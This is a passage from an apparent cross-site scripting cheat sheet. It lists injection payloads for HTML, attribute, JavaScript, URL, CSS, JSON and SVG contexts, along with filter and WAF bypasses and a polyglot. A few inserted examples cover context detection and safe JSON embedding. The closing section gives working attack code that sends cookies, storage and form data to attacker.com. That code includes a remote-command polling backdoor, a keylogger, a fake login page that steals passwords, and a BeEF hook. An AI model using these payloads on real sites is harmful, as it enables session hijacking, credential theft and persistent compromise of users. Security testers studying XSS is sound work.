<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>

2. ATTRIBUTE CONTEXT
When input lands inside an HTML attribute:
<!-- Vulnerable Code -->
<input type="text" value="[USER_INPUT]">
<!-- Attack: Break Out of Attribute -->
<input type="text" value="" onfocus="alert(1)" autofocus="">
<!-- Or -->
<input type="text" value=""><script>alert(1)</script>">

Context-Specific Payloads:
<!-- Inside value attribute -->
Input:  " onfocus=alert(1) autofocus="
Result: <input value="" onfocus=alert(1) autofocus="">
<!-- Inside src/href -->
Input:  javascript:alert(1)
Result: <a href="javascript:alert(1)">Link</a>
<!-- Inside event handler (already in JS context) -->
Original: <div onclick="alert('Hello [INPUT]')">
Input:    '); alert(document.cookie); //
Result:   <div onclick="alert('Hello '); alert(document.cookie); //')">
<!-- Inside style attribute -->
Input:  </style><script>alert(1)</script>
Result: <div style="</style><script>alert(1)</script>">
<!-- Data attributes -->
Input:  x" onload="alert(1)
Result: <img data-value="x" onload="alert(1)">

Breaking Out of Quotes:
<!-- ๐ฏ Double Quotes -->
"><script>alert(1)</script>
" onfocus=alert(1) autofocus="
" onclick=alert(1) "
<!-- ๐ฏ Single Quotes -->
'><script>alert(1)</script>
' onfocus=alert(1) autofocus='
' onclick=alert(1) '
<!-- ๐ฏ No Quotes (if attribute value not quoted) -->
onfocus=alert(1) autofocus
onmouseover=alert(1)
3๏ธโฃ ๐ JAVASCRIPT CONTEXT
When input lands inside <script> tags or inline JavaScript:
// โ ๏ธ Vulnerable Code Pattern 1
<script>
var username = '[USER_INPUT]';
</script>
// ๐ฅ Attack: String Termination
Input: '; alert(1); //
Result: var username = ''; alert(1); //';
// โ ๏ธ Vulnerable Code Pattern 2
<script>
var data = {name: "[USER_INPUT]"};
</script>
// ๐ฅ Attack: Object Injection
Input: ", role: "admin
Result: var data = {name: "", role: "admin"};
// โ ๏ธ Vulnerable Code Pattern 3
<script>
showMessage('[USER_INPUT]');
</script>
// ๐ฅ Attack: Function Escape
Input: '); alert(1); //
Result: showMessage(''); alert(1); //');
Advanced JavaScript Context Payloads:
// ๐ฏ String Context Escapes
';alert(1);//
';alert(1);'
';alert(String.fromCharCode(88,83,83));//
// ๐ฏ Bypassing Backslash Escaping (app rewrites ' to \' but leaves \ alone)
\';alert(1);//      becomes  \\';alert(1);//   (the injected backslash escapes the added one, so the quote is live again)
\\';alert(1);//
// ๐ฏ Multi-line Comments
*/alert(1);//
// ๐ฏ Template Literals
${alert(1)}
`${alert(1)}`
// ๐ฏ Function Context
)};alert(1);//
));alert(1);//
// ๐ฏ Array Context
];alert(1);//
[1,2,3];alert(1);//
// ๐ฏ Object Context
}};alert(1);//
});alert(1);//
// ๐ฏ JSONP Callback (the callback parameter is reflected verbatim in front of the JSON body)
?callback=alert(1);//      Result: alert(1);//({"data":"value"})
Real-World Example:
// โ ๏ธ Vulnerable Analytics Code
<script>
var trackingData = {
userId: '[USER_ID]',
page: '[PAGE_NAME]',
referrer: '[REFERRER]'
};
sendAnalytics(trackingData);
</script>
// ๐ฅ Attack on PAGE_NAME parameter (the value sits in a SINGLE-quoted string, so the payload has to close it with ')
Input: ', userId: 'admin', xss: alert(1), fake: '
Result:
var trackingData = {
userId: '123',
page: '', userId: 'admin', xss: alert(1), fake: '',
referrer: 'google.com'
};
// ๐ฅ Executes: alert(1) as soon as the object literal is evaluated (duplicate keys are allowed in ES2015+ object literals; the last userId wins)
4๏ธโฃ ๐ URL CONTEXT
When input used in href, src, or action attributes:
<!-- โ ๏ธ Vulnerable Code -->
<a href="[USER_INPUT]">Click here</a>
<!-- ๐ฅ JavaScript Protocol -->
<a href="javascript:alert(1)">Click here</a>
<!-- ๐ฅ Data Protocol -->
<a href="data:text/html,<script>alert(1)</script>">Click here</a>
<!-- ๐ฅ VBScript (IE only) -->
<a href="vbscript:msgbox(1)">Click here</a>
URL Context Exploitation:
<!-- ๐ฏ Direct JavaScript -->
javascript:alert(1)
javascript:alert(document.cookie)
javascript:eval(atob('YWxlcnQoMSk=')) <!-- Base64 encoded -->
<!-- ๐ฏ Data URLs -->
data:text/html,<script>alert(1)</script>
data:text/html,<img src=x onerror=alert(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<!-- ๐ฏ About Protocol (an about:blank frame inherits the parent's origin, so script injected into it runs as the page) -->
about:blank
<!-- ๐ฏ File Protocol (browsers refuse to navigate from http(s) pages to file: URLs; only relevant for local HTML or embedded-browser apps) -->
file:///etc/passwd
<!-- ๐ฏ With URL Encoding (the body of a javascript: URL is percent-decoded before it runs, and the server usually decodes once as well) -->
javascript:alert%281%29
<!-- ๐ฏ With HTML character references (decoded by the HTML parser when the URL sits in an attribute such as href) -->
&#106;avascript:alert(1) <!-- decimal -->
&#x6A;avascript:alert(1) <!-- hex -->
<!-- ๐ฏ Obfuscated (the URL parser strips tab, newline and carriage return from the scheme) -->
java	script:alert(1) <!-- Tab character -->
java
script:alert(1) <!-- Newline -->
java
script:alert(1) <!-- Carriage return -->
jAvAsCrIpT:alert(1) <!-- Scheme is case insensitive -->
Meta Refresh XSS:
<!-- ๐ฏ Meta tag redirect (legacy: current Chrome, Firefox and Safari block javascript: and data: URLs in meta refresh and in top-level navigations) -->
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">
5๏ธโฃ ๐จ CSS CONTEXT
When input lands in <style> tags or style attributes:
<!-- โ ๏ธ Vulnerable Code -->
<style>
body {
background: [USER_INPUT];
}
</style>
<!-- ๐ฅ Attack: Break Out -->
</style><script>alert(1)</script><style>
<!-- ๐ฅ Or use expression() (IE only) -->
<style>
body {
background: expression(alert(1));
}
</style>
CSS Context Payloads:
<!-- ๐ฏ Breaking Out of Style Tag -->
</style><script>alert(1)</script><style>
</style><img src=x onerror=alert(1)><style>
<!-- ๐ฏ CSS expression() (IE 7 and older only; no current browser executes it) -->
expression(alert(1))
expression(alert(document.cookie))
<!-- ๐ฏ Import External CSS (no script execution, but attacker CSS can exfiltrate attribute values such as CSRF tokens via attribute selectors and background-image requests) -->
@import 'https://attacker.com/xss.css';
<!-- ๐ฏ CSS with JavaScript URL (legacy only; modern browsers never run javascript: from a CSS url()) -->
background: url('javascript:alert(1)');
<!-- ๐ฏ Unicode Escapes: CSS escapes are decoded by the CSS parser, not the HTML parser, so this never becomes a <script> element. They only help to smuggle expression( or url( past a filter that inspects the raw CSS text -->
\3c script\3e alert(1)\3c /script\3e <!-- CSS-decodes to <script>alert(1)</script> as CSS tokens, not as markup -->
<!-- ๐ฏ Style Attribute Context: close the attribute, then add an event handler (onload does not fire on a div) -->
" onmouseover="alert(1)
; background:url('javascript:alert(1)'); <!-- legacy only, see above -->
6๏ธโฃ ๐ JSON CONTEXT
When input is reflected in JSON responses:
// โ ๏ธ Vulnerable Code (JSON built by string concatenation instead of a serializer)
{"username": "[USER_INPUT]"}
// ๐ฅ Attack: Break Out of String
Input: ", "role": "admin", "xss": "
Result: {"username": "", "role": "admin", "xss": ""}
// ๐ฅ If the response is served as text/html (wrong Content-Type), or the client drops the value into innerHTML
Input: <img src=x onerror=alert(1)>
Result: {"username": "<img src=x onerror=alert(1)>"}
// ๐ฅ Rendered as HTML: XSS. Served as application/json with X-Content-Type-Options: nosniff, the browser only displays text.
7๏ธโฃ ๐จ SVG CONTEXT
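The JavaScript-context patterns above (string termination, object injection) and the JSON-context break-out share one root cause: untrusted data is concatenated into a script or JSON literal. The following added example (not code from the original page) builds the page's "Pattern 2" script both ways and checks what the browser would actually execute. The attacker inputs are constructed for the demonstration; `jsonForScript` is the hardening shown here and is not a library call.

```javascript
// Added example, not from the original page: embedding untrusted data in an
// inline <script>, the concatenation way the page's "Pattern 2" shows and the
// serializer way that closes both the quote break-out and the </script>
// break-out. The inputs at the bottom are constructed for the demonstration.

// Vulnerable: the template assumes `name` contains no quote and no </script>.
function buildScriptUnsafe(name) {
  return `<script>var data = {name: "${name}"};</script>`;
}

// JSON.stringify escapes quotes and backslashes, but the HTML parser ends the
// <script> element at the first "</script" regardless of JavaScript syntax,
// so '<', '>' and '&' are emitted as \u escapes that only the JS engine decodes.
// U+2028/U+2029 are escaped too: valid in JSON, line terminators in older JS engines.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function buildScriptSafe(name) {
  return `<script>var data = ${jsonForScript({ name })};</script>`;
}

// How many times does the HTML parser see "</script"? More than one means the
// payload ended the element early and whatever follows is parsed as markup.
function scriptTerminators(html) {
  return (html.toLowerCase().match(/<\/script/g) || []).length;
}

// Emulate what runs: cut at the FIRST </script> like the HTML parser does, then
// evaluate that JavaScript and hand back the `data` object it produced.
function evaluateEmbedded(scriptHtml) {
  const m = /^<script>([\s\S]*?)<\/script>/i.exec(scriptHtml);
  if (!m) return { error: 'no complete script element' };
  try {
    return new Function(m[1] + '\nreturn data;')();
  } catch (e) {
    return { error: e.name }; // SyntaxError: the string literal was cut open
  }
}

// Constructed attacker inputs: the object-injection payload and the break-out payload.
const OBJECT_INJECTION = '", role: "admin';
const SCRIPT_BREAKOUT = '</script><img src=x onerror=alert(1)>';
```

With the unsafe builder, `OBJECT_INJECTION` yields an object whose `role` is `admin`, and `SCRIPT_BREAKOUT` produces two `</script` terminators, so the `<img>` lands in the HTML parser and fires. With `jsonForScript`, both inputs come back as plain string values of `name`. The same `jsonForScript` output is what to emit when a server returns JSON for a client that later writes it into the DOM; on the client side the value must still go through `textContent`, never `innerHTML`.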
SVG has multiple XSS vectors:
<!-- ๐ฏ Basic SVG XSS -->
<svg onload=alert(1)>
<!-- ๐ฏ SVG with Script Tag -->
<svg><script>alert(1)</script></svg>
<!-- ๐ฏ SVG Animation -->
<svg><animatetransform onbegin=alert(1)>
<!-- ๐ฏ SVG with href -->
<svg><a href="javascript:alert(1)"><text>Click</text></a></svg>
<!-- ๐ฏ SVG with foreignObject -->
<svg><foreignObject><script>alert(1)</script></foreignObject></svg>
<!-- ๐ฏ SVG Events -->
<svg><circle onload=alert(1) />
<svg><rect onmouseover=alert(1) />
<svg><path onfocus=alert(1) />
<!-- ๐ฏ SVG with XLink -->
<svg xmlns="http://www.w3.org/2000/svg">
<script href="https://attacker.com/xss.js"/>
</svg>
๐ฌ Context Detection Strategy
๐ฏ STEP-BY-STEP CONTEXT ANALYSIS:
1๏ธโฃ Submit Test String:
Input: UNIQUE_STRING_12345
2๏ธโฃ View Page Source (Ctrl+U) and the live DOM (DevTools Elements tab, for values written by client-side script that view-source never shows)
Search for: UNIQUE_STRING_12345
3๏ธโฃ Identify Context:
Found In                  | Context
--------------------------|-----------
<div>STRING</div>         | HTML Body
<input value="STRING">    | Attribute
var x = 'STRING';         | JavaScript
<a href="STRING">         | URL
<style>STRING</style>     | CSS
{"data":"STRING"}         | JSON
4๏ธโฃ Choose Appropriate Payload
5๏ธโฃ Test Execution
6๏ธโฃ Refine if Filtered
๐ ๏ธ 5. ADVANCED EXPLOITATION TECHNIQUES
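The six detection steps above, turned into a small checker (an added example, not code from the original page): given a response body and the canary, it reports the syntactic context the canary landed in, using the same distinctions as the table. The canary value, the sample responses and the function names are constructed for the demonstration; a real run would feed it the HTTP response captured through the proxy.

```javascript
// Added example, not from the original page: classify where a reflected canary
// landed in an HTML response. The canary value and the sample responses below
// are constructed for this demonstration.
const CANARY = 'zq7xCanary9k';

// Tiny state machine over the text of one (unclosed) tag: are we inside an
// attribute value when the tag text ends, and which attribute is it?
function attributeState(tagText) {
  let i = 1;
  while (i < tagText.length && !/[\s/]/.test(tagText[i])) i++; // skip the tag name
  let state = 'between', name = '', quote = '';
  for (; i < tagText.length; i++) {
    const c = tagText[i];
    if (state === 'between') {
      if (!/[\s/]/.test(c)) { name = c; state = 'name'; }
    } else if (state === 'name') {
      if (c === '=') state = 'beforeValue';
      else if (/\s/.test(c)) state = 'afterName';
      else name += c;
    } else if (state === 'afterName') {
      if (c === '=') state = 'beforeValue';
      else if (!/\s/.test(c)) { name = c; state = 'name'; }
    } else if (state === 'beforeValue') {
      if (/\s/.test(c)) continue;
      if (c === '"' || c === "'") { quote = c; state = 'quoted'; }
      else { quote = ''; state = 'unquoted'; }
    } else if (state === 'quoted') {
      if (c === quote) state = 'between';
    } else if (state === 'unquoted') {
      if (/\s/.test(c)) state = 'between';
    }
  }
  const inValue = state === 'quoted' || state === 'unquoted' || state === 'beforeValue';
  return { inValue, name: name.toLowerCase(), quote };
}

// Look at everything BEFORE the canary and decide which parser state it sits in.
// Deliberate limitation, to stay short: a '>' inside an earlier quoted attribute
// value is taken as the end of that tag.
function classifyContext(body, contentType = 'text/html', canary = CANARY) {
  const idx = body.indexOf(canary);
  if (idx === -1) return 'not reflected';
  // A JSON or plain-text body is not parsed as HTML at all (given a correct Content-Type).
  if (!contentType.toLowerCase().startsWith('text/html')) return `non-html body (${contentType})`;
  const before = body.slice(0, idx);
  const lower = before.toLowerCase();
  // Raw-text elements: the HTML parser does not recognise tags inside them.
  if (lower.lastIndexOf('<script') > lower.lastIndexOf('</script')) return 'javascript';
  if (lower.lastIndexOf('<style') > lower.lastIndexOf('</style')) return 'css';
  if (lower.lastIndexOf('<!--') > lower.lastIndexOf('-->')) return 'html comment';
  const lastLt = before.lastIndexOf('<');
  if (lastLt > before.lastIndexOf('>')) {
    const a = attributeState(before.slice(lastLt));
    if (!a.inValue) return 'tag (attribute name position)';
    const q = a.quote ? `quoted with ${a.quote}` : 'unquoted';
    if (a.name.startsWith('on')) return `event handler attribute ${a.name} (${q})`;
    if (['href', 'src', 'action', 'formaction', 'data', 'xlink:href'].includes(a.name)) return `url attribute ${a.name} (${q})`;
    if (a.name === 'style') return `style attribute (${q})`;
    return `attribute ${a.name} (${q})`;
  }
  return 'html body';
}

// Constructed sample responses, one per row of the table above plus two extras.
const SAMPLES = [
  ['<div>zq7xCanary9k</div>', 'text/html'],
  ['<input type="text" value="zq7xCanary9k">', 'text/html'],
  ["<script>var x = 'zq7xCanary9k';</script>", 'text/html'],
  ['<a href="zq7xCanary9k">Link</a>', 'text/html'],
  ['<style>body{background:zq7xCanary9k}</style>', 'text/html'],
  ['{"data":"zq7xCanary9k"}', 'application/json'],
  ["<div onclick=\"alert('Hello zq7xCanary9k')\">", 'text/html'],
  ['<img src=x data-v=zq7xCanary9k>', 'text/html'],
];

function classifyAll() {
  return SAMPLES.map(([body, ct]) => classifyContext(body, ct));
}
```

The attribute report includes the quote character because it decides the break-out payload (`"`, `'` or none, as in the "Breaking Out of Quotes" list above), and an `on*` attribute is reported separately because input there is already in JavaScript context and needs no tag at all.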
๐ง Filter Bypass Techniques
๐ฏ COMMON FILTERS & BYPASSES:
๐ FILTER: Blocks "<script>"
๐ BYPASSES:
โโโ <ScRiPt>alert(1)</ScRiPt> (Case variation)
โโโ <scr<script>ipt>alert(1)</script> (Nested tags: works only when the filter strips the tag once, non-recursively)
โโโ <img src=x onerror=alert(1)> (Alternative tag)
โโโ <svg onload=alert(1)> (SVG vector)
โโโ <iframe src="javascript:alert(1)"> (IFrame)
๐ FILTER: Blocks "javascript:"
๐ BYPASSES:
โโโ JaVaScRiPt:alert(1) (Case variation)
โโโ java	script:alert(1) (Tab character)
โโโ java
script:alert(1) (Newline)
โโโ &#106;avascript:alert(1) (HTML character reference, decoded by the HTML parser when the URL sits in an attribute)
โโโ data:text/html,<script>alert(1)</script> (Data URI)
โโโ vbscript:msgbox(1) (VBScript - IE only)
๐ FILTER: Blocks "alert"
๐ BYPASSES:
โโโ prompt(1)
โโโ confirm(1)
โโโ console.log(1)
โโโ window['ale'+'rt'](1)
โโโ window['al\x65rt'](1)
โโโ eval('ale'+'rt(1)')
โโโ eval(atob('YWxlcnQoMSk=')) (Base64)
โโโ Function('alert(1)')()
โโโ top['al'+'ert'](1)
โโโ parent['alert'](1)
๐ FILTER: Blocks "document.cookie"
๐ BYPASSES:
โโโ document['cookie']
โโโ document[`cookie`]
โโโ window['document']['cookie']
โโโ top.document.cookie
โโโ parent.document.cookie
โโโ frames[0].document.cookie
๐ FILTER: Blocks Parentheses ()
๐ BYPASSES:
โโโ <svg onload=alert`1`> (Template literal call; the argument arrives as an array)
โโโ <svg onload=setTimeout`alert\x281\x29`> (Template literal string; the \x escapes hide the parentheses from the filter)
โโโ <script>onerror=alert;throw 1</script> (No call syntax: the global error handler receives the thrown value)
โโโ <script>throw onerror=alert,1</script> (Same idea in one statement)
๐ FILTER: Blocks Spaces
๐ BYPASSES:
โโโ <img/src=x/onerror=alert(1)> (Forward slash)
โโโ <img%09src=x%09onerror=alert(1)> (Tab - %09)
โโโ <img%0asrc=x%0aonerror=alert(1)> (Newline - %0a)
โโโ <img%0dsrc=x%0donerror=alert(1)> (Carriage return - %0d)
โโโ <svg><script>alert(1)</script></svg> (No spaces needed)
๐ FILTER: Blocks Quotes (' ")
๐ BYPASSES:
โโโ <img src=x onerror=alert(1)> (No quotes needed)
โโโ <iframe src=javascript:alert(1)> (No quotes)
โโโ <svg onload=alert(1)> (No quotes)
โโโ <img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
๐ FILTER: Strips/Encodes < and >
๐ BYPASSES:
โโโ Use existing tags with events
โโโ &lt;script&gt;alert(1)&lt;/script&gt; (HTML character references: only useful if the app decodes them before writing into the page)
โโโ %3Cscript%3Ealert(1)%3C/script%3E (URL encoding: only useful if the app decodes a second time)
โโโ Context-specific: break out of attributes instead
๐ FILTER: Blocks Event Handlers (on*)
๐ BYPASSES:
โโโ <svg><script>alert(1)</script></svg>
โโโ <iframe src="javascript:alert(1)">
โโโ <object data="javascript:alert(1)">
โโโ <embed src="javascript:alert(1)">
โโโ <a href="javascript:alert(1)">Click</a>
๐ FILTER: Length Limitations
๐ BYPASSES:
โโโ <script src=//xx.yy></script> (Shortest possible attacker domain; xx.yy is a placeholder)
โโโ <svg onload=eval(name)> (Payload carried in window.name, set by the attacker's opener page)
โโโ <script src=//evil.com/x.js></script> (Load the real payload from outside)
โโโ <svg onload=eval(location.hash.slice(1))> (Payload carried after # in the URL, which never reaches the server or its logs)
๐ก๏ธ WAF Bypass Techniques
๐ก๏ธ WEB APPLICATION FIREWALL EVASION:
๐ฏ TECHNIQUE 1: ENCODING
โโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ HTML Character References (decoded by the HTML parser in text and attribute values, never inside <script>) -->
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
<!-- ๐ฏ URL Encoding (decoded once by the server or framework) -->
%3Cscript%3Ealert(1)%3C/script%3E
<!-- ๐ฏ Double URL Encoding (for stacks that decode twice, e.g. a proxy and then the application) -->
%253Cscript%253Ealert(1)%253C/script%253E
<!-- ๐ฏ Unicode Escapes (only meaningful inside a JavaScript string literal) -->
\u003cscript\u003ealert(1)\u003c/script\u003e
<!-- ๐ฏ Hex Escapes (same: JavaScript string context only) -->
\x3cscript\x3ealert(1)\x3c/script\x3e
<!-- ๐ฏ Mixed Encoding (partial URL encoding to defeat naive string signatures) -->
%3C%73%63%72%69%70%74%3Ealert(1)%3C/script%3E
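Each encoding in the list above is undone by a different layer, and a WAF bypass only works when the target context actually decodes that layer. The following added example (not code from the original page) models the three layers in the order a browser meets them and shows which of the payloads above come out as live characters in which context. The decoders are minimal and constructed for the demonstration; `whatBrowserSees` and its context names are assumptions, not a library API.

```javascript
// Added example, not from the original page: which decoding layer turns each
// encoded form back into the characters the JavaScript engine sees. Contexts
// and inputs are constructed for the demonstration.

// HTML character references (&#106; &#x6A; &lt; ...) are decoded by the HTML
// parser in text and attribute values. A few named references are enough here.
function decodeHtmlCharRefs(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      return String.fromCodePoint(parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10));
    }
    return named[body.toLowerCase()] ?? m; // unknown name: leave as-is
  });
}

// \xHH and \uHHHH are decoded by the JavaScript lexer, and only inside a string literal.
function decodeJsStringEscapes(s) {
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
    (m, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Apply the layers in the order a browser would: the server URL-decodes the
// parameter once, then the HTML parser or the JS lexer decodes depending on context.
function whatBrowserSees(payload, context) {
  const afterServer = decodeURIComponent(payload); // one pass only: %25 becomes %, %253C stays %3C
  switch (context) {
    case 'text':        // between tags
    case 'attribute':   // e.g. inside href="..."
      return decodeHtmlCharRefs(afterServer);
    case 'script':      // raw text element: no character-reference decoding at all
      return afterServer;
    case 'js-string':   // inside a string literal within <script>: JS escapes apply
      return decodeJsStringEscapes(afterServer);
    default:
      throw new Error(`unknown context: ${context}`);
  }
}
```

Reading the results: `&#106;avascript:` becomes `javascript:` in an attribute but stays inert inside `<script>`; `\u003c` becomes `<` only inside a JS string; double URL encoding survives one server decode as `%3C`, which is only useful when a second decode happens downstream.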
๐ฏ TECHNIQUE 2: OBFUSCATION
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ String Concatenation -->
<script>eval('al'+'ert(1)')</script>
<script>eval('al\x65rt(1)')</script>
<!-- ๐ฏ Base64 Encoding -->
<script>eval(atob('YWxlcnQoMSk='))</script>
<!-- ๐ฏ Character Codes -->
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<!-- ๐ฏ Octal/Hex Escapes (both decode to alert(1)) -->
<script>eval('\141\154\145\162\164\50\61\51')</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x31\x29')</script>
๐ฏ TECHNIQUE 3: CASE MANIPULATION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<ScRiPt>alert(1)</sCrIpT>
<IMG SRC=x ONERROR=alert(1)>
<SvG OnLoAd=alert(1)>
๐ฏ TECHNIQUE 4: WHITESPACE INSERTION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<img/src=x/onerror=alert(1)> <!-- Forward slash -->
<img%0csrc=x%0conerror=alert(1)> <!-- Form feed - %0c (also HTML whitespace) -->
<img%09src=x%09onerror=alert(1)> <!-- Tab -->
<img%0asrc=x%0aonerror=alert(1)> <!-- Newline -->
๐ฏ TECHNIQUE 5: TAG BREAKING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ If WAF checks complete tag -->
<img src=x onerror
=alert(1)>
<img src=x
onerror=alert(1)>
<!-- ๐ฏ Null bytes (legacy IE only; current parsers replace NUL with U+FFFD, so this mainly defeats filters that truncate on NUL) -->
<img src=x%00onerror=alert(1)>
๐ฏ TECHNIQUE 6: USING COMMENTS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ HTML Comments: browsers do NOT honour comments inside a tag, so these only work when a server-side sanitizer strips the comment before the browser sees the markup -->
<img src=x o<!--comment-->nerror=alert(1)>
<scr<!--comment-->ipt>alert(1)</scr<!--comment-->ipt>
<!-- ๐ฏ JavaScript Comments (valid JavaScript, so these always run) -->
<script>alert/*comment*/(1)</script>
<script>/*comment*/alert(1)/*comment*/</script>
๐ฏ TECHNIQUE 7: ALTERNATIVE PROTOCOLS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
java	script:alert(1) <!-- Tab -->
java
script:alert(1) <!-- Newline -->
java
script:alert(1) <!-- Carriage return -->
&#106;avascript:alert(1) <!-- HTML character reference, decoded in attribute values -->
data:text/html,<script>alert(1)</script> <!-- blocked for top-level navigation in current browsers; in an iframe the document gets an opaque origin and cannot read the parent page -->
๐ฏ TECHNIQUE 8: POLYGLOT PAYLOADS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ Works in multiple contexts -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
๐ฏ TECHNIQUE 9: DOM CLOBBERING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- Named elements shadow document/window properties; useful when script is filtered but plain markup is not -->
<form name=getElementById> <!-- document.getElementById now resolves to this form and breaks code that depends on it -->
<img name=x src=y onerror=alert(1)> <!-- window.x now resolves to the img element; the onerror fires on its own because src fails -->
๐ฏ TECHNIQUE 10: RARE TAGS
โโโโโโโโโโโโโโโโโโโโโโโโโโ
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<keygen onfocus=alert(1) autofocus>
<embed src=x onerror=alert(1)>
๐ฃ Advanced Payload Techniques
Self-Contained Payloads -
// ๐ฏ Payload that works anywhere
<script>fetch('//attacker.com?'+document.cookie)</script>
// ๐ฏ Minimal payload
<svg onload=alert(1)>
// ๐ฏ No quotes needed
<img src=x onerror=alert(document.cookie)>
// ๐ฏ Works in attributes
" onfocus=fetch('//attacker.com?c='+document.cookie) autofocus="
// ๐ฏ URL context with the "alert" keyword hidden from a keyword filter
javascript:eval('al\x65rt(1)')
Multi-Stage Payloads -
// ๐ฏ Stage 1: Load external script
<script src=//attacker.com/x.js></script>
// ๐ฏ Stage 2 (x.js): Full exploitation code
var s = document.createElement('script');
s.src = '//attacker.com/stage2.js';
document.body.appendChild(s);
// ๐ฏ Stage 3: Persistent backdoor
setInterval(function() {
fetch('//attacker.com/cmd')
.then(r => r.text())
.then(eval);
}, 5000); // Poll for commands every 5 seconds
Cookie Stealing -
// Note: document.cookie never includes cookies flagged HttpOnly. If the session cookie is HttpOnly, use the session in place (fetch() from the injected script) instead of stealing it.
// ๐ฏ Method 1: Image beacon (encode the value so ; and = in the cookie string survive the query string)
<script>
new Image().src='//attacker.com/steal?c='+encodeURIComponent(document.cookie);
</script>
// ๐ฏ Method 2: Fetch API
<script>
fetch('//attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
cookie: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage)
})
});
</script>
// ๐ฏ Method 3: Form submission
<script>
var f = document.createElement('form');
f.method = 'POST';
f.action = '//attacker.com/steal';
var i = document.createElement('input');
i.name = 'data';
i.value = document.cookie;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
</script>
// ๐ฏ Method 4: XMLHttpRequest
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', '//attacker.com/steal', true);
xhr.send(document.cookie);
</script>
Session Hijacking -
// ๐ฏ Complete session hijack payload
<script>
(function() {
// ๐ Collect all sensitive data
var data = {
url: window.location.href,
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage),
dom: document.documentElement.innerHTML,
forms: []
};
// ๐ฃ Capture all form data
document.querySelectorAll('form').forEach(function(form) {
var formData = {};
form.querySelectorAll('input, textarea, select').forEach(function(field) {
if(field.name) {
formData[field.name] = field.value;
}
});
data.forms.push(formData);
});
// ๐ค Send to attacker
fetch('https://attacker.com/hijack', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify(data)
});
// โจ๏ธ Install keylogger
document.addEventListener('keypress', function(e) {
fetch('https://attacker.com/keys', {
method: 'POST',
body: JSON.stringify({
key: e.key,
target: e.target.name,
time: Date.now()
})
});
});
})();
</script>
Phishing Attack -
<script>
// ๐ญ Replace entire page with fake login
document.body.innerHTML = `
<div style="max-width:400px;margin:100px auto;padding:40px;box-shadow:0 0 20px rgba(0,0,0,0.1);border-radius:8px;font-family:Arial,sans-serif;">
<img src="${window.location.origin}/logo.png" style="display:block;margin:0 auto 30px;width:200px;">
<h2 style="text-align:center;color:#333;margin-bottom:10px;">Session Expired</h2>
<p style="text-align:center;color:#666;margin-bottom:30px;font-size:14px;">Please log in again to continue</p>
<form id="phish" style="display:flex;flex-direction:column;gap:15px;">
<input type="email" name="email" placeholder="Email" required style="padding:12px;border:1px solid #ddd;border-radius:4px;font-size:14px;">
<input type="password" name="password" placeholder="Password" required style="padding:12px;border:1px solid #ddd;border-radius:4px;font-size:14px;">
<button type="submit" style="padding:12px;background:#007bff;color:white;border:none;border-radius:4px;font-size:16px;cursor:pointer;">Log In</button>
</form>
</div>
`;
document.getElementById('phish').onsubmit = function(e) {
e.preventDefault();
var formData = new FormData(this);
fetch('https://attacker.com/phish', {
method: 'POST',
body: JSON.stringify({
site: window.location.hostname,
email: formData.get('email'),
password: formData.get('password'),
cookies: document.cookie
})
}).then(() => {
window.location.reload(); // ๐ Reload after stealing credentials
});
};
</script>
BeEF Hook Integration -
// ๐ฃ Load Browser Exploitation Framework (BeEF listens on port 3000 by default; serve hook.js over HTTPS when the target page is HTTPS, otherwise the browser blocks it as mixed content)
<script src="https://attacker.com:3000/hook.js"></script>
// ๐ฏ Now attacker has full control over victim's browser:
// - ๐ธ Take screenshots
// - โจ๏ธ Log keystrokes
// - โก Execute commands
// - ๐ Proxy through victim
// - ๐ฏ Exploit browser vulnerabilities
๐ฅ 6. ATTACK IMPACT & REAL-WORLD CASES
๐ Attack Capabilities Matrix
WHAT ATTACKERS CAN DO WITH XSS
๐ช SESSION HIJACKING ๐ด CRITICAL
